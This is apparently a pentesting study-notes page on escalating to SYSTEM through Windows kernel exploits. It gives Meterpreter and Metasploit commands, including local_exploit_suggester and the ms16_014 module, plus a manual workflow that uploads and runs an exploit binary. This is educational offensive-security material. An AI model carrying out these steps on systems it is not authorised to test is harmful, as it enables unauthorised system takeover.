Dark Arts
  • index
  • BUY ME A BOOK
  • 🪄Dark Magic
    • Pentesting
      • Industry Methodologies
    • Scopes of Testing
    • Reconnaissance
      • Passive
        • WHOIS
        • DNS
          • nslookup
          • dig
        • WAF
        • Subdomain
        • Google Dork
        • Misc. Techniques
        • Leaked Passwords
      • Active
        • Browser & Plugins
        • ping & traceroute
        • fping
        • telnet & netcat
        • DNS
          • Zone Transfer
          • DNS Amplification DDoS Attack Breakdown
        • Misc. Techniques
    • Vulnerability Assessment
    • Attack Types
  • 🕷️Aragoogs Nest
    • Web Application Overview & Security
      • Security Testing
      • Common Threats & Risks
    • Web Application Architecture
      • Technologies
    • HTTP/S
      • Message
      • Request
      • Response
        • Status Code
    • Crawling/Spidering
  • 🧪Potions
    • Web Browsers
    • Computer Networking
      • Network Protocol
      • Packets
      • OSI Layer
        • Layer 3: Network
        • Layer 4: Transport
      • DNS
        • Primary-Secondary
        • Local Name Resolution
        • Domain Hierarchy
        • FQDN
        • Lookups
        • DNS Resolution
        • DNS Records
        • Security: Attack-Defense (Default)
  • 🎆Spells
    • 📜Linux Scroll
    • 📜WebShell Scroll
    • git
      • Attacks + Vulnerabilities
  • 🖼️Flaws w/ Magical Frameworks
    • Windows
      • In a Nutshell
      • CVE-2019-0708: BlueKeep
      • CVE-2017-0144: EternalBlue: MS17-010
      • Attacking Services
        • MS IIS - WebDAV
        • SMB
        • HTTP File Server (HFS)
        • Apache Tomcat Web Server
        • RDP
        • WinRM
      • File System Vulnerabilities
      • Credential Dumping
        • Password Search in Windows Configuration Files
        • Mimikatz
        • Pass-the-Hash Attack
    • Linux
      • In a Nutshell
      • CVE-2014-6271: Shellshock
      • Attacking Services
        • FTP
        • SSH
        • SAMBA
        • SMTP
        • RSYNC
      • Dumping Hashes
  • 🌼Marauder's Boost
    • Privilege Escalation
    • Windows PrivEsc
      • Windows Kernel Exploit
      • Bypassing UAC
      • Access Token Impersonation
    • Linux PrivEsc
      • Linux Kernel Exploit
      • Misconfigured Cron Jobs
      • Exploiting SUID Binaries
      • shells
      • File Permissions
  • ☠️Death Eaters
    • Post Exploitation
      • Windows
      • Linux
  • 🪄OLLIVANDERS
    • nmap
      • Host Discovery
      • Port Scan
      • Service & OS
      • NSE
      • Firewall/IDS Evasion
      • Scan Optimization
      • Misc. Methods
    • ffuf
    • Hydra
    • Metasploit Framework
      • Architecture
      • Must to Know
      • msfvenom
      • Auxiliary Modules
      • Service Enumeration
      • Vulnerability Scanning
      • Imports
      • Automating
    • Vulnerability Scanners
    • Wireshark
  • 🚂Platform 9(3/4)
    • Auth-Auth
      • Authentication
        • Password-based Authentication
        • Basic Authentication
        • Multi-factor Authentication
        • Access Token
        • Token-based Authentication
          • JWT
          • OAuth 2.0
    • Secure Headers
      • Content-Security-Policy (CSP)
    • Cryptography
      • Caesar Cipher
  • ⛲Port Pensieve
    • Enumeration
      • SMB & NetBIOS
      • SNMP
    • Wordlists
  • 🔆DUELS
    • Pivoting
    • SMB Relay Attack
  • 🗺️Marauder's Map
    • Web Application Pentesting
    • API Pentesting
      • GraphQL
        • Primer
    • Mobile Application Pentesting
  • 🎧SIDE CHANNEL
    • Side Channel Analysis
    • Timing Side-Channel Attacks
      • Vulnerable Login
  • 🥃Sky
    • Cloud Basics
    • Cloud Management
      • Shared Responsibility Model
    • Using Cloud Resources
      • Monitoring & Alerts
      • Identity & Access Management
      • Scalability & Availability
      • Solution Design
    • Cloud Providers
    • Cloud Security & Regulatory Compliance
      • Resource Protection
      • ICCA: Cloud Security & Regulatory Compliance
    • ICCA Preparation
      • Knowledge Tests
      • Lab
  • 🔷Obsidian
    • Pentest Engagement
      • Scoping
    • Pentest Ethics
      • Rules of Engagement
    • Auditing Fundamentals
      • Process/Lifecycle
      • Pentest & Security Auditing
      • GRC
      • Standards, Frameworks & Guidelines
      • From Audit to Pentest
  • 💢Threat Modeling
    • Why Threat Model?
  • 📡THREAT INTEL
    • Threat Intelligence
    • Tool Dump
  • 📱Anything-Mobile-IoT
    • Firmware
    • Firmware Analysis
      • Example: CVE-2016-1555
    • Firmware Installation/Flashing
  • 🎉Mischeif
    • Social Engineering
    • Phishing
      • GoPhish
    • Pretexting
Powered by GitBook
On this page
  • Windows Kernel Exploitation
  • Tools and Environment
  • Demonstration w/ Metasploit
  • Demonstration Manual
  1. Marauder's Boost
  2. Windows PrivEsc

Windows Kernel Exploit

PreviousWindows PrivEscNextBypassing UAC

Last updated 8 months ago

A kernel is the core component of an operating system that manages hardware resources and enables communication between hardware and software. It has complete control over the system's resources, such as CPU, memory, and devices, and acts as a bridge between the hardware and applications.

In Windows, the kernel is known as Windows NT, which operates similarly to traditional kernels but with unique design choices. It functions in two main modes:

  • User Mode: Programs and services have limited access to system resources, operating within a restricted environment.

  • Kernel Mode: The kernel has unrestricted access to all system resources, managing tasks such as device control and memory management.

Windows NT's design allows for efficient resource management while maintaining system security and stability.

Windows Kernel Exploitation

Kernel exploits on Windows aim to target vulnerabilities in the Windows kernel, allowing attackers to execute arbitrary code with elevated privileges to run system commands or obtain a system shell. The exploitation process varies depending on the Windows version and specific vulnerability but generally follows these steps:

Methods for Privilege Escalation:

  1. Identifying Kernel Vulnerabilities: Analyze the target system for known kernel vulnerabilities.

  2. Exploiting Vulnerabilities: Download, compile, and transfer kernel exploits to the target system for execution.

This process can lead to system crashes or data loss, so careful execution is essential.

Tools and Environment

Windows Exploit Suggester: Compares the target's patch levels against Microsoft's vulnerability database to identify missing patches and possible exploits.

Windows Kernel Exploits: A repository of kernel exploits sorted by CVE.

Demonstration w/ Metasploit

# Assume having access to normal privileged account
getuid
getprivs
getsystem # auto technique of meterpreter to get privilege. But incase it fails?

search suggester
use post/multi/recon/local_exploit_suggester
show options
set SESSION
run

# search for the vulnerabilities and understand them before exploiting
# example exploitation
use exploit/windows/local/ms16_014_wmi_recv_notif
show options
set SESSION
run

Demonstration Manual

# Assume having access to normal privileged account
shell
systeminfo
# copy systeminfo output to a text file - sysinfo.txt
python3 windows-exploit-suggester.py --update
python3 windows-exploit-suggester.py --database [db.xls] --systeminfo sysinfo.txt

# In the meterpreter session --
cd Temp\\
upload exploit.exe # [exploit found from windows kernel exploits] search for exploit based on the suggestions
.\exploit.exe
whoami
🌼
GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.GitHub
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合GitHub
Logo
Logo